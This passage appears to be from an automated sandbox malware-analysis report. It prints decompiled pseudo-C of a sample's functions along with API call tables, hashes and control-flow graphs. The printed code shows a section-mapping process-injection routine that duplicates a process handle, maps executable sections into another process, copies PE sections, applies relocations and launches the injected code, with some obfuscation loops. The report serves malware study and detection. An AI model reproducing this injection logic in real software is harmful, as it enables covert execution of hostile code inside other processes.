					 *_t181 = 0x18;
					_push( &_v52);
					_push(_t181);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
						_v12 = _t172;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t182 =  &_v88;
						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t172;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t172;
								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
									_t196 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t172;
						 *_t100 = _a12 + 0x10000;
						_t183 =  &_v92;
						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t172;
								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
								if(_t217 == 0) {
									L21();
									if(_t217 == 0 && _t217 != 0) {
									}
									_t200 = _t198 + 4;
									_push(0x2e62);
									_t201 = _t200 + 4;
									_push(0x2260);
									_t106 =  *_t201;
									_t202 = _t201 + 4;
									_t157 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t158 = _t157;
									asm("loop 0xffffffc2");
									_t159 = _t158 ^ 0xbcc951dd;
									_t198 = _t202 - _t159;
									_t188 = _a8 +  *_a8;
									_t137 =  *(_t188 + 6) & 0x0000ffff;
									_push(_t188);
									_t160 = _t188;
									if(_v56 == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
										_t198 = _t198 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t222 = _v56;
									if(_v56 == 0) {
										_push(_t189);
										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
										__eflags = _t192;
										while(1) {
											__eflags =  *_t192;
											if( *_t192 == 0) {
												break;
											}
											_t173 =  *_t192;
											_t192 = _t192 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t193);
										_t172 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t174);
										_t172 = _t174 - 0x1760;
										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t129 =  *_t198;
				return L0040119E(_t91, _t129, _t172, _t222);
			}


































































                                                          0x004014bc
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158a
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                                                          • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014B3 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 200 4014b3-4014c4 202 4014db 200->202 203 4014cc-4014f1 call 40119e 200->203 202->203 207 4014f3 203->207 208 4014f6-4014fb 203->208 207->208 210 401501-401512 208->210 211 401824-40182c 208->211 215 401822 210->215 216 401518-401541 210->216 211->208 214 401831-401842 211->214 218 401845-401866 call 40119e 214->218 219 401838-40183e 214->219 215->214 216->215 226 401547-40155e NtDuplicateObject 216->226 219->218 226->215 228 401564-401588 NtCreateSection 226->228 230 4015e4-40160a NtCreateSection 228->230 231 40158a-4015ab NtMapViewOfSection 228->231 230->215 233 401610-401614 230->233 231->230 232 4015ad-4015c9 NtMapViewOfSection 231->232 232->230 234 4015cb-4015e1 232->234 233->215 235 40161a-40163b NtMapViewOfSection 233->235 234->230 235->215 236 401641-40165d NtMapViewOfSection 235->236 236->215 238 401663 call 401668 236->238
                                                          C-Code - Quality: 63%
                                                          			E004014B3(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				intOrPtr* _t165;
				void* _t168;
				long _t176;
				intOrPtr _t178;
				void* _t179;
				long* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t194;
				void* _t195;
				intOrPtr* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				void* _t210;
				intOrPtr* _t211;
				void* _t212;
				long _t227;

				_t206 = _t205 + 1;
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t206;
				_t207 = _t206 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
				_t90 =  *_t185;
				if(_t90 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t121 = _t203 - 0x44;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t123 = _t203 - 0x3c;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t100 = _t203 - 0x50;
						 *(_t100 + 4) = _t176;
						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t102 = _t203 - 0x48;
							 *_t102 = _t176;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t104 = _t203 - 0x40;
								 *_t104 = _t176;
								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
								if(_t227 == 0) {
									L20();
									if(_t227 == 0 && _t227 != 0) {
									}
									_t210 = _t207 + 4;
									_push(0x2e62);
									_t211 = _t210 + 4;
									_push(0x2260);
									_t106 =  *_t211;
									_t212 = _t211 + 4;
									_t161 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t162 = _t161;
									asm("loop 0xffffffc2");
									_t163 = _t162 ^ 0xbcc951dd;
									_t207 = _t212 - _t163;
									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t139 =  *(_t194 + 6) & 0x0000ffff;
									_push(_t194);
									_t164 = _t194;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t165 = _t164 + 0xf8;
										__eflags = _t165;
									} else {
										_t165 = _t164 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t165 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
										_t207 = _t207 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t195);
									_t232 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t195);
										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t178 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t199);
										_t176 = 0;
										__eflags = 0;
										_t108 = _t203 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
									} else {
										L53();
										_pop(_t179);
										_t176 = _t179 - 0x1760;
										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t207;
				return L0040119E(_t91, _t131, _t176, _t232);
			}















































                                                          0x004014b4
                                                          0x004014bc
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
                                                          • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 240 4014bf-4014c4 244 4014db 240->244 245 4014cc-4014f1 call 40119e 240->245 244->245 249 4014f3 245->249 250 4014f6-4014fb 245->250 249->250 252 401501-401512 250->252 253 401824-40182c 250->253 257 401822 252->257 258 401518-401541 252->258 253->250 256 401831-401842 253->256 260 401845-401866 call 40119e 256->260 261 401838-40183e 256->261 257->256 258->257 268 401547-40155e NtDuplicateObject 258->268 261->260 268->257 270 401564-401588 NtCreateSection 268->270 272 4015e4-40160a NtCreateSection 270->272 273 40158a-4015ab NtMapViewOfSection 270->273 272->257 275 401610-401614 272->275 273->272 274 4015ad-4015c9 NtMapViewOfSection 273->274 274->272 276 4015cb-4015e1 274->276 275->257 277 40161a-40163b NtMapViewOfSection 275->277 276->272 277->257 278 401641-40165d NtMapViewOfSection 277->278 278->257 280 401663 call 401668 278->280
                                                          C-Code - Quality: 62%
                                                          			E004014BF(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				asm("invalid");
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L54();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
